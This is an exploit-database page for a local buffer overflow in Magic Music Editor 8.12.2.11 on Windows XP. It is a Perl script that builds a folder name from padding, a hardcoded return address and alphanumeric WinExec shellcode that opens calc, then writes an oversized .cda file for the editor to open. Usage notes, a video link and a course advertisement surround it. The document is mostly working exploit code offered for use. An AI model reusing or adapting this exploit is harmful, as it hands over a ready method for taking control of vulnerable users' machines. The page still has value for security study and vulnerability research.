Magic Music Editor - Local Buffer Overflow

EDB-ID:

16264

CVE:

N/A




Platform:

Windows

Date:

2011-03-02


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

#!/usr/bin/perl
#
#
#
#[+]Exploi Title: Exploit Buffer Overflow Magic Music Editor 
#[+]Date: 03\01\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.magic-video-software.com/downloadserver/Magic-Music-Editor.exe
#[+]POC Found By: AtT4CKxT3rR0r1ST(http://www.exploit-db.com/exploits/16255/)
#[+]Version: 8.12.2.11
#[+]Tested on: WIN-XP SP3 
#[+]CVE: N/A
#[+]Language: English
#
#Este exploit é Buffer Overflow q foi encontrado por AtT4CKxT3rR0r1ST(http://www.exploit-db.comexploits/16255/)
#
#Criado por C4SS!0 G0M3S
#E-mail Louredo_@hotmail.com
#Site www.x000.org
#
#
#
#How Use:
#
# For the exploit to work you put this file on drive C in the early C: \ exploit.pl
# Must be the address then click the exploit that creates a folder and either AAAAAAAA
# inside it will have the file open file.cda magic music editor open the file inside the folder
# THEN BOOM OPENS CALC
#
#Video: http://www.youtube.com/watch?v=T7KlxfNCy1o
#
#
print q{
 Author: C4SS!0 G0M3S
 E-mail: Louredo_@hotmail.com
 Site: www.x000.org/
 
 };
 print "[+]Creating File fil3.cda...\n";
 sleep(2);
$buf = "\x41" x 25;
$buf .= pack('V',0x77207D33);
$buf .= TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIP3O0PPU8SS3QBL3SF40XPPONDM15MVSLKON6A;#SHELLCODE WINEXEC CALC

mkdir($buf);

open(f,">c:\\$buf\\fil3.cda");
print f ("\x41" x 90000);
close(f);